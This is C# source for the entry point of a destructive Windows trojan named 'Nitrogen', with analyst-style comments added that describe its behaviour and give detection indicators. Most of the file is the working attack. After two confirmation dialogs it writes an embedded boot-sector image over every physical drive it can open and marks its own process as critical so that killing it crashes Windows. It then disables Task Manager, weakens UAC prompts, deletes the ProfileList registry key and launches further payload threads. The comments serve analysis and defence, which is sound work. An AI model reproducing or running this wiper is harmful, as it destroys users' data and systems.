using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Threading;
using System.Windows.Forms;
using static Nitrogen.Dll_Imports;

namespace Nitrogen
{
    // Analyst summary: entry point of a sample that describes itself (in its own dialog
    // text) as a destructive trojan. After two explicit confirmations it overwrites the
    // first sector of every physical drive it can open, marks its own process with
    // BreakOnTermination, tampers with UAC / Task Manager policy values, deletes the
    // ProfileList registry subtree and starts further payload threads.
    // `variables`, `payloads` and the P/Invoke members (CreateFile, WriteFile,
    // NtSetInformationProcess, GenericAll, MbrSize, ...) are declared elsewhere in the
    // project and are not visible here.
    internal static class Program
    {
        /// <summary>
        /// Main entry point of the application.
        /// </summary>
        /// <remarks>
        /// Exits immediately when <c>variables.AlreadyRunning()</c> is true or when
        /// <c>variables.IsAnalyzed()</c> is false, then asks for confirmation twice.
        /// Both dialogs default to "No" (<c>MessageBoxDefaultButton.Button2</c>);
        /// <c>Run()</c> is reached only when both are answered "Yes".
        /// </remarks>
        [STAThread]
        static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            if (variables.AlreadyRunning())
            {
                // Single-instance guard; how it is implemented is not visible here.
                Environment.Exit(0);
            }
            else if (!variables.IsAnalyzed())
            {
                // NOTE(review): judging by the message text this is an environment gate
                // (runs only where IsAnalyzed() reports an isolated/analysis machine) -
                // the check itself lives in `variables`; confirm there before relying on it.
                MessageBox.Show("For your security, this malware can only run in isolated environments.","Nitrogen - ENVIRONMENT ERROR",MessageBoxButtons.OK,MessageBoxIcon.Error);
                Environment.Exit(0);
            }
            // First confirmation. These window titles and texts are fixed strings and can
            // serve as static indicators when triaging the binary.
            var dlg = MessageBox.Show("You have run a trojan known as Nitrogen.\nRunning the malware will result in data loss and your machine being unusable.\n\nDO YOU WANT TO RUN THE MALWARE AND DESTROY YOUR COMPUTER?","Nitrogen - MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Warning,MessageBoxDefaultButton.Button2);
            if (dlg == DialogResult.Yes)
            {
                // Second and last confirmation before any destructive action.
                var dlg2 = MessageBox.Show("THIS IS THE FINAL WARNING!!\nRUNNING THIS MALWARE WILL REALLY WIPE YOUR OPERATING SYSTEM!!!!\n\nDO YOU STILL WANT TO RUN IT AND SAY GOODBYE TO YOUR OS??","Nitrogen - LAST MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Error,MessageBoxDefaultButton.Button2);
                if (dlg2 == DialogResult.Yes)
                {
                    Run();
                }
                else
                {
                    Environment.Exit(0);
                }
            }
            else
            {
                Environment.Exit(0);
            }
        }

        /// <summary>
        /// Executes the destructive stage, in this order: boot-sector overwrite,
        /// BreakOnTermination on the current process, first payload thread, registry
        /// policy tampering, second payload thread.
        /// </summary>
        /// <remarks>
        /// Defender view: every step here needs administrative rights except the HKCU
        /// write, so running as a standard user blocks most of it. Observable behaviors
        /// are (1) write handles on <c>\\.\PhysicalDriveN</c> from a non-system process,
        /// (2) a process enabling debug privilege and setting information class 0x1D on
        /// itself, and (3) the registry changes listed below.
        /// </remarks>
        private static void Run()
        {
            // MBR Made by mattia2010.exeyt on Discord
            // Boot-sector image embedded in the binary: a short run of 16-bit code, zero
            // padding, and the 0x55 0xAA boot signature as the last two bytes. The opening
            // bytes (B4 00 B0 13 CD 10) look like a BIOS int 10h video-mode call, so this
            // appears to replace the boot loader with a display routine - TODO confirm by
            // disassembly. Laid out 16 bytes per row for readability.
            var mbrData = new byte[] {
                0xE8, 0x03, 0x00, 0xE8, 0x1D, 0x00, 0xB4, 0x00, 0xB0, 0x13, 0xCD, 0x10, 0x68, 0x00, 0xA0, 0x07,
                0xB4, 0x0C, 0x30, 0xC0, 0x31, 0xDB, 0x31, 0xC9, 0x31, 0xD2, 0xC3, 0x31, 0xC9, 0x31, 0xD2, 0xFF,
                0x06, 0x6C, 0x7C, 0x81, 0xFA, 0x18, 0x01, 0x73, 0xF2, 0xE8, 0x10, 0x00, 0xE8, 0x2D, 0x00, 0x41,
                0x81, 0xF9, 0x84, 0x03, 0x72, 0xED, 0x31, 0xC9, 0x42, 0xEB, 0xE8, 0xC3, 0x89, 0xCB, 0x31, 0xD3,
                0x88, 0xD8, 0x02, 0x06, 0x6C, 0x7C, 0xC0, 0xE8, 0x02, 0xEB, 0x00, 0x3C, 0x37, 0x77, 0x05, 0x3C,
                0x20, 0x72, 0x05, 0xC3, 0x2C, 0x10, 0xEB, 0xF3, 0x04, 0x20, 0xEB, 0xEF, 0x89, 0xD7, 0xC1, 0xE7,
                0x06, 0x01, 0xD7, 0xC1, 0xE7, 0x02, 0x01, 0xCF, 0x26, 0x88, 0x05, 0xC3, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA };
            try
            {
                // Walks device paths \\.\PhysicalDrive0 .. \\.\PhysicalDrive299 and writes
                // mbrData at the start of each handle (no seek precedes the write).
                // The length written is MbrSize - presumably one 512-byte sector; the
                // constant is declared in Dll_Imports, confirm there.
                // Detection: raw physical-drive write handles opened by anything other
                // than disk tooling are a high-signal event for EDR / file-system filters.
                for (int i = 0; i < 300; i++)
                {
                    var mbr = CreateFile($"\\\\.\\PhysicalDrive{i}", GenericAll, FileShareRead | FileShareWrite, IntPtr.Zero, OpenExisting, 0, IntPtr.Zero);
                    WriteFile(mbr, mbrData, MbrSize, out uint lpNumberOfBytesWritten, IntPtr.Zero);
                }
            }
            // Any exception from the loop is discarded; execution continues regardless.
            catch { }
            int isCritical = 1;
            // 0x1D is passed as the process-information class; the local's name matches the
            // NT "break on termination" class, which makes Windows bugcheck if the process
            // is terminated - so killing this process during response is itself disruptive.
            int BreakOnTermination = 0x1D;
            // EnterDebugMode enables SeDebugPrivilege for the current process; it is called
            // immediately before the NtSetInformationProcess call below.
            Process.EnterDebugMode();
            NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof(int));
            Thread thr;
            // payloads.del_sys is defined elsewhere; NOTE(review): the name suggests
            // deletion of system files - verify against the payloads class.
            thr = new Thread(payloads.del_sys);
            thr.Start();
            RegistryKey rk;
            // HKCU policy value that disables Task Manager for the current user.
            rk = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
            rk.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
            rk.Close();
            // HKLM UAC policy values. ConsentPromptBehaviorAdmin = 0 lets administrators
            // elevate without a prompt; ConsentPromptBehaviorUser is set to 3.
            // Both values are worth alerting on whenever they change outside managed policy.
            rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
            rk.SetValue("ConsentPromptBehaviorAdmin", 0, RegistryValueKind.DWord);
            rk.SetValue("ConsentPromptBehaviorUser", 3, RegistryValueKind.DWord);
            rk.Close();
            // Deletes the whole ProfileList subtree under
            // HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion (the key Windows uses to map
            // account SIDs to user profiles). Recovery needs a registry backup or restore.
            rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion");
            rk.DeleteSubKeyTree("ProfileList");
            rk.Close();
            // payloads.story is defined elsewhere; its behavior cannot be told from here.
            thr = new Thread(payloads.story);
            thr.Start();
        }

        /// <summary>
        /// Endless loop that sleeps for a random 2000-4999 ms interval, picks a random
        /// integer in 0..7 and inverts one boolean flag in <c>variables</c>.
        /// </summary>
        /// <remarks>
        /// This method only flips flags; whatever reads them (presumably the individual
        /// payload routines) is outside this file. It never returns, so the caller is
        /// expected to run it on its own thread - no call site is visible here.
        /// </remarks>
        public static void random_payloads()
        {
            for (; ; )
            {
                // A fresh Random is created for the delay and for the selection on every pass.
                Random sleeptime = new Random();
                Thread.Sleep(sleeptime.Next(2000,5000));
                Random rand = new Random();
                // Upper bound of Next is exclusive: i is 0..7, one branch per flag below.
                int i = rand.Next(0,8);
                if (i == 0)
                {
                    if (variables.sounds == true)
                    {
                        variables.sounds = false;
                    }
                    else
                    {
                        variables.sounds = true;
                    }
                }
                else if (i == 1)
                {
                    // The drawcursor toggle is disabled by the author; iconmove is toggled instead.
                    /*if (variables.drawcursor == true) { variables.drawcursor = false; } else { variables.drawcursor = true; }*/
                    if (variables.iconmove == true)
                    {
                        variables.iconmove = false;
                    }
                    else
                    {
                        variables.iconmove = true;
                    }
                }
                else if (i == 2)
                {
                    if (variables.extreme == true)
                    {
                        variables.extreme = false;
                    }
                    else
                    {
                        variables.extreme = true;
                    }
                }
                else if (i == 3)
                {
                    if (variables.gdi_payloads == true)
                    {
                        variables.gdi_payloads = false;
                    }
                    else
                    {
                        variables.gdi_payloads = true;
                    }
                }
                else if (i == 4)
                {
                    if (variables.keyboard == true)
                    {
                        variables.keyboard = false;
                    }
                    else
                    {
                        variables.keyboard = true;
                    }
                }
                else if (i == 5)
                {
                    if (variables.mouse == true)
                    {
                        variables.mouse = false;
                    }
                    else
                    {
                        variables.mouse = true;
                    }
                }
                else if (i == 6)
                {
                    if (variables.textchanger == true)
                    {
                        variables.textchanger = false;
                    }
                    else
                    {
                        variables.textchanger = true;
                    }
                }
                else if (i == 7)
                {
                    if (variables.window_shake == true)
                    {
                        variables.window_shake = false;
                    }
                    else
                    {
                        variables.window_shake = true;
                    }
                }
            }
        }
    }
}